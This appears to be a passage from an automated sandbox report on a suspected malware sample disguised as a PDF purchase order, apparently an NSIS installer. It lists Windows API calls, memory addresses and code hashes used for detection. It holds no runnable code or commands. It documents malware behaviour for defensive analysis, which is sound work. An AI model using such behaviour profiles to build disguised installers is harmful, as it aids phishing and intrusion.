                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                    • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1356686001-0
                                                                                                                                    • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3449924974-0
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,00000000,00402F6A,?,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: nsa
                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
